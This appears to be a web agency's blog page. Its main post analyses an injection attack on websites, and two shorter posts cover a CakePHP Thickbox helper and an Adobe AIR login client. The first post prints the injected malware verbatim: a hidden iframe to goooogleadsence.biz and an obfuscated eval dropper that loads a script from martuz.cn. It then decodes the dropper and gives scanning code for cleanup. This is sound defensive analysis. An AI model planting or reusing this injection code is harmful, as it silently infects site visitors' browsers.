25 May

Reverse engineering and removing the new, enhanced HTML iframe injection attack

Latest Developments

I've spent many hours lately fixing this ongoing iframe injection trend, and I've noticed one thing: every time our team cleans it up, it comes back in a new, enhanced form that is harder to delete automatically. The first time it began as a plain hidden iframe in HTML, and as the same iframe wrapped in a PHP echo:

HTML:
<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

PHP:
echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

After that the code got progressively less readable. The current version looks like this (it arrives wrapped in an HTML comment, which is why the <!-- and --> markers are part of the sample):

<!--
(function(KWaP){var hSgtJ=':76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d';
eval(unescape(hSgtJ.replace(KWaP,'%')))})(/\:/g);
-->

Let's reverse engineer it for fun. See that little evil eval()? Replace it with alert(), or any other logging function such as console.log() in Firebug, and run the snippet in a blank page you control rather than on the infected site; the outer function then only performs the replace() and unescape() and hands you the decoded string instead of executing it. That gives us:

<!--
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>");}
-->
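The same decoding step done offline under Node, as an added example that is not part of the original post: the payload is the hSgtJ string from the sample above, the helper names are my own, and nothing is ever passed to eval(). It goes a little beyond the post: decodePayload() takes the separator as a parameter so it also handles variants that use a character other than ':', and foldStringConcat() joins the "ma"+"rtuz.cn" pieces so the host name can be pulled out of the decoded source.

```javascript
// Added example (not from the original post): decode the ':'-escaped dropper
// offline, without calling eval(). INJECTED_PAYLOAD is the hSgtJ string from
// the sample above; decodePayload, foldStringConcat, extractHosts and analyse
// are my own helper names.

const INJECTED_PAYLOAD = ':76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d';

// The dropper passes this in as KWaP (written /\:/g in the sample).
const SEPARATOR = /:/g;

// Equivalent of the legacy unescape(): expands %uXXXX and %XX sequences.
function unescapeLegacy(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u4, x2) => String.fromCharCode(parseInt(u4 || x2, 16)));
}

// Stage 1 of the dropper minus the eval: swap the separator for '%' and unescape.
function decodePayload(payload, separator) {
  return unescapeLegacy(payload.replace(separator, '%'));
}

// Fold "ab"+"cd" into "abcd" (repeatedly) so indicators split across string
// literals, like the host name, become visible to a plain search.
function foldStringConcat(src) {
  const pair = /"([^"\\]*)"\+"([^"\\]*)"/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, a, b) => '"' + a + b + '"');
  } while (src !== prev);
  return src;
}

// Host names from src= attributes, scheme-relative (//host) or absolute.
function extractHosts(src) {
  const re = /src=["']?(?:https?:)?\/\/([^\/"'\s>]+)/g;
  const hosts = new Set();
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1]);
  return [...hosts];
}

function analyse(payload, separator) {
  const decoded = decodePayload(payload, separator);
  const folded = foldStringConcat(decoded);
  return { decoded: decoded, folded: folded, hosts: extractHosts(folded) };
}

const report = analyse(INJECTED_PAYLOAD, SEPARATOR);
console.log(report.folded);
console.log('hosts contacted: ' + report.hosts.join(', '));
```

The decoded string matches the alert() output shown above character for character; the folded form additionally reads src=//martuz.cn/vid/?id=, which is the indicator to block at the proxy or DNS while the files are being cleaned.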

That *.cn domain is back again. Read top to bottom, the decoded code runs in any browser except Chrome whose user agent contains "Win" but not "NT 6" (XP-era Windows, not Vista or 7), skips visitors who already carry a miek=1 cookie, and uses the zrvzts global as a run-once guard. The inner eval() concatenates ScriptEngineMajorVersion(), ScriptEngineMinorVersion() and ScriptEngineBuildVersion(), which exist only in Internet Explorer's JScript, so j is the IE engine version and stays empty elsewhere; that value becomes the id parameter of the script it then loads from martuz.cn. Two details matter for cleanup: the host name is split into "ma"+"rtuz.cn" so a plain search for the domain misses it, and the closing tag is written as <\/script> so it does not terminate the injected script block. To find this new injection, the common pattern to look for is:

3bdocument:2ewrite(:

Some other patterns you might want to check:

document.write('<iframe

www.zj5173.com

How to clean your website?

Use the grep command, or a Windows tool such as PowerGrep, to search every file for those patterns. An option for advanced users is to keep the live site as a checked-out working copy under version control: a plain "svn status" then lists every modified file, "svn diff" shows exactly what was inserted, and "svn revert" puts the original back. Keep in mind that cleaning the files only removes the payload; as the repeated reinfections above show, it will return until the path the attacker uses to write to the files is found and closed.
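The same search done from Node instead of grep, so that every hit is reported with file, line and the indicator that matched, as an added example that is not part of the original post. The indicators are the strings listed above plus three generic ones of my own (the hidden 1x1 iframe shape of the first wave, a document.write of an iframe or script tag, and the eval(unescape(...replace(...))) dropper shape), and each line is first normalised by joining "a"+"b" string pieces so a host name split as "ma"+"rtuz.cn" is still caught. The file names and contents are constructed for the demonstration.

```javascript
// Added example (not from the original post): scan a set of files for the
// indicators listed above. SAMPLE_FILES is constructed for the demonstration;
// on a real site the contents would come from fs.readFileSync().

const INDICATORS = [
  { name: 'escaped-document-write', re: /3bdocument:2ewrite\(/ },                 // stage-1 dropper (from the post)
  { name: 'document-write-tag', re: /document\.write\(["']<(?:iframe|script)/i },  // generalises document.write('<iframe
  { name: 'zj5173.com', re: /www\.zj5173\.com/i },                                 // host from the post
  { name: 'goooogleadsence.biz', re: /goooogleadsence\.biz/i },                     // host from the first wave
  { name: 'martuz.cn', re: /martuz\.cn/i },                                        // host from the decoded sample
  { name: 'hidden-iframe', re: /<iframe[^>]*(?:width=["']?1\b|visibility:\s*hidden)/i }, // my generic shape
  { name: 'eval-unescape', re: /eval\(unescape\([^)]*\.replace\(/ },              // my generic dropper shape
];

// Join "a"+"b" and 'a'+'b' so a host name split across literals is visible.
function normalise(line) {
  return line.replace(/"\+"|'\+'/g, '');
}

// Returns one {file, line, indicator} record per indicator per matching line.
function scanText(file, text, indicators) {
  indicators = indicators || INDICATORS;
  const hits = [];
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = normalise(raw);
    for (const ind of indicators) {
      if (ind.re.test(line)) hits.push({ file: file, line: i + 1, indicator: ind.name });
    }
  });
  return hits;
}

// files: { name: contents }
function scanFiles(files, indicators) {
  const hits = [];
  for (const name of Object.keys(files)) hits.push(...scanText(name, files[name], indicators));
  return hits;
}

// Constructed sample tree: a clean page, the first-wave PHP echo, the escaped
// dropper, and the split host name that a fixed-string grep for martuz.cn misses.
const SAMPLE_FILES = {
  'index.html': '<html><body><h1>Welcome</h1></body></html>',
  'footer.php': 'echo "<iframe src=\\"http://goooogleadsence.biz/?click=8F9DA\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";',
  'header.php': '<!--\n(function(K){var h=\':3bdocument:2ewrite(:22x:22):3b\';eval(unescape(h.replace(K,\'%\')))})(/:/g);\n-->',
  'split.js': 'document.write("<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\\/script>");',
};

const hits = scanFiles(SAMPLE_FILES);
for (const h of hits) console.log(h.file + ':' + h.line + ': ' + h.indicator);
```

The fixed strings in INDICATORS can equally be put one per line in a file and handed to grep -rF -f for a first pass; the normalisation step is what the Node version adds.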

 

You can also contact us directly if you need assistance with this. We have helped secure more than 50 websites in the last three months.

11 Feb

Thickbox Helper for CakePHP

CakePHP, Latest Developments

It's tedious to copy and paste the same JavaScript over and over. That's why I've written a Thickbox helper for CakePHP, the result of a project that involved a lot of Thickbox implementations. If you don't know what it is, see the Thickbox jQuery plugin.

To use it, add the helper to the $helpers array of your controller. Its use is very simple:

1. For inline content:

PHP:
<?php
// set height, width and the DOM ID of the hidden div that holds the content
$thickbox->setProperties(array('id'=>'domId', 'height'=>'300', 'width'=>'334'));
$thickbox->setPreviewContent('click me'); // the link which will trigger Thickbox on click
$thickbox->setMainContent('<div>see it??</div>'); // the content which will be shown in Thickbox
echo $thickbox->output();
?>

 

2. For AJAX:

PHP:
<?php
// the href is fetched with AJAX; Html->url() resolves /controller/action against the app base
$thickbox->setProperties(array('id'=>'domId','type'=>'ajax','ajaxUrl'=>'/controller/action'));
$thickbox->setPreviewContent("Click me to see thickbox");
echo $thickbox->output();
?>

Here's the helper:

PHP:
<?php
class ThickboxHelper extends AppHelper {

    var $helpers = array('Javascript', 'Html');

    // Options collected by setProperties()/setPreviewContent()/setMainContent()
    // until output() renders and clears them.
    var $options = array();

    /**
     * Set properties - DOM ID, height and width, type of Thickbox window ('inline' or 'ajax')
     *
     * @param array $options
     */
    function setProperties($options = array())
    {
        if(!isset($options['type']))
        {
            $options['type'] = 'inline';
        }
        $this->options = $options;
    }

    /**
     * The link text (or markup) that opens the Thickbox. Treated as trusted HTML.
     */
    function setPreviewContent($content)
    {
        $this->options['previewContent'] = $content;
    }

    /**
     * The markup shown inside an inline Thickbox. Treated as trusted HTML.
     */
    function setMainContent($content)
    {
        $this->options['mainContent'] = $content;
    }

    function reset()
    {
        $this->options = array();
    }

    function output()
    {
        extract($this->options);
        if($type=='inline')
        {
            // Thickbox reads the target div from the inlineId parameter of the href
            $href = '#TB_inline?';
            $href .= '&inlineId='.$id;
        }
        elseif($type=='ajax')
        {
            // Thickbox fetches the href with an AJAX request and shows the response
            $ajaxUrl = $this->Html->url($ajaxUrl);
            $href = $ajaxUrl.'?';
        }

        if(isset($height))
        {
            $href .= '&height='.$height;
        }
        if(isset($width))
        {
            $href .= '&width='.$width;
        }

        // h() escapes the attribute values, so id, height and width cannot break
        // out of the attribute even if they ever come from user input.
        $output = '<a class="thickbox" href="'.h($href).'">'.$previewContent.'</a>';

        if($type=='inline')
        {
            $output .= '<div id="'.h($id).'" style="display:none;">'.$mainContent.'</div>';
        }

        // clear the options so the helper can be used again in the same view
        $this->reset();

        return $output;
    }

    /**
     * Add the Thickbox CSS and JS to $scripts_for_layout.
     */
    function beforeRender()
    {
        $out = $this->Html->css('/effects/css/thickbox.css').'<script src="'.$this->Html->url('/effects/js/thickbox-compressed.js').'"></script>';
        $view =& ClassRegistry::getObject('view');
        $view->addScript($out);
    }

}
?>

 

You'll need to copy the Thickbox files to /app/webroot/effects. You can keep them in any folder, but since our team follows the plugin layout, it's set up that way.

- Abhimanyu Grover

28 Feb

Killer Applications with CakePHP, JQuery and Adobe Air

CakePHP, Latest Developments, jQuery

Have you ever wished you could write desktop applications for your own web app? If you are like me, that is, like most lazy web programmers, you have never put your hands on a desktop language, even though all of us know how much flexibility a desktop client can add to a web app.

I came across a new development framework, Adobe AIR, which lets you build desktop applications using only web technologies. If you are good at HTML and AJAX you can start with it right away. I was surprised to see how many applications already use it. After just three hours of experimentation I started loving this new tool. Some of the advantages that impressed me:

  • Really fast: I built a stock market monitoring tool in just 3 hours. It didn't feel like learning something new; it was like developing AJAX-enabled HTML pages and testing them in a browser. Once you're done, you create an XML configuration file, copy a JS file from the framework, compile it, and you're done.
  • Use your favourite JS library: This is an amazing feature. My personal favourite is jQuery and I use it in almost every project. Please note: you need the latest version of jQuery to get it working with Adobe AIR; they recently patched it specifically for AIR. I already wasted 30 minutes on security issues. (AIR's application sandbox refuses eval()-style code generation once the page has loaded, which is what older jQuery builds tripped over.)
  • Cool CSS extensions: Check this out.
  • Easy debugging: errors and exceptions appear in the command window.
  • Easy drag and drop: super-easy events like dragstart, drag, dragend, dragenter, dragover, dragleave and drop.

Check out my stock market tool, just a basic version:

Everything talks to a backend application that runs on CakePHP. The login action (UsersController::login) returns the session_key as the response body when login succeeds, and the string 'false' when it fails:

JavaScript:
function process_login()
{
    $("#status").html("Logging in...");
    var user = $('#user').val();
    var pass = $('#pass').val();
    // the backend answers with the session key, or the string 'false' on failure;
    // note that user and pass travel as part of the URL path here
    $.get("http://localhost/StockBack/users/login/" + user + "/" + pass, function(session_key){
        if (session_key == 'false')
        {
            $("#status").html("Unable to login");
        }
        else
        {
            $("#status").html("Logged in successfully");
            $("#login").hide("slow");
            $("#panel").show("slow");
        }
    });
}

(Sorry for posting code like this, but my code editor in WordPress sucks; if anyone knows a good one, please recommend it.)
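A hardened version of that login flow, as an added example that is not part of the original post and not the StockBack backend's actual API: it assumes a hypothetical backend that accepts POST /users/login with a JSON body and answers {"ok":true,"session_key":"..."} or {"ok":false}, and the host name stock.example is a placeholder. It moves the credentials out of the URL path (which ends up in server, proxy and browser history logs), refuses to send them over plain http, and parses the reply strictly instead of comparing the body against the string 'false'. The transport is a parameter so the flow runs offline; fakeBackend is a constructed stand-in.

```javascript
// Added example (not from the original post). The backend contract, the
// stock.example host and the demo credentials are assumptions for the demo.

// Build the login request. Credentials go in the body, never in the URL path.
function buildLoginRequest(baseUrl, user, pass) {
  if (!/^https:\/\//i.test(baseUrl)) {
    throw new Error('refusing to send credentials to a non-TLS URL: ' + baseUrl);
  }
  return {
    url: baseUrl.replace(/\/+$/, '') + '/users/login',
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
    body: JSON.stringify({ user: user, pass: pass }),
  };
}

// Parse the reply strictly: only a 200 carrying a well-formed key is a login.
// The original check (body == 'false') treats an error page, an empty body or a
// redirect as success.
function parseLoginResponse(status, bodyText) {
  if (status !== 200) return { ok: false, reason: 'http ' + status };
  let data;
  try {
    data = JSON.parse(bodyText);
  } catch (e) {
    return { ok: false, reason: 'reply is not JSON' };
  }
  const key = data && data.ok === true ? data.session_key : undefined;
  if (typeof key === 'string' && /^[A-Za-z0-9_-]{32,}$/.test(key)) {
    return { ok: true, sessionKey: key };
  }
  return { ok: false, reason: 'login rejected' };
}

// The session key stays in memory and is sent as a header on later calls,
// so it never appears in a URL either.
function authHeaders(sessionKey) {
  return { Authorization: 'Bearer ' + sessionKey };
}

// transport(req) -> Promise<{status, body}>. In AIR/jQuery this would wrap
// $.ajax; it is a parameter so the flow can run without a network.
async function login(transport, baseUrl, user, pass) {
  const req = buildLoginRequest(baseUrl, user, pass);
  const reply = await transport(req);
  return parseLoginResponse(reply.status, reply.body);
}

// Constructed stand-in for the backend, for the demonstration only.
const DEMO_KEY = 'k3y_' + 'a'.repeat(36);
async function fakeBackend(req) {
  if (req.method !== 'POST' || req.url !== 'https://stock.example/users/login') {
    return { status: 404, body: 'Not Found' };
  }
  const creds = JSON.parse(req.body);
  const accepted = creds.user === 'demo' && creds.pass === 'correct horse';
  return {
    status: 200,
    body: JSON.stringify(accepted ? { ok: true, session_key: DEMO_KEY } : { ok: false }),
  };
}

login(fakeBackend, 'https://stock.example', 'demo', 'correct horse')
  .then(r => console.log(r.ok ? 'logged in' : 'unable to login: ' + r.reason));
```

In the AIR client the transport would be a thin wrapper around $.ajax({type:'POST', ...}) that resolves with the status and response text; everything else stays as above.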

Some useful links to get started:

Developing Adobe AIR Applications with HTML and Ajax

Adobe AIR Quick Starts for HTML

Adobe AIR Language Reference for HTML Developers

The Adobe AIR HTML documentation set (a ZIP file) is available for download here:

http://www.adobe.com/go/learn_air_html_docs

Hire us

Contact us to get a free quote on your project.